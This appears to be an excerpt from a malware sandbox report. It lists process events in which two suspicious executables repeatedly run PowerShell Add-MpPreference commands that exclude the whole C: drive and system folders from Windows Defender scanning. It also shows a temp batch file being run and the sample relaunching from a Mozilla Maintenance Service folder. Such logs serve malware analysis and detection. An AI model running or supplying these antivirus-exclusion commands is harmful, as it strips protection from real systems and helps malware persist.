Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe VolumeInformation
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
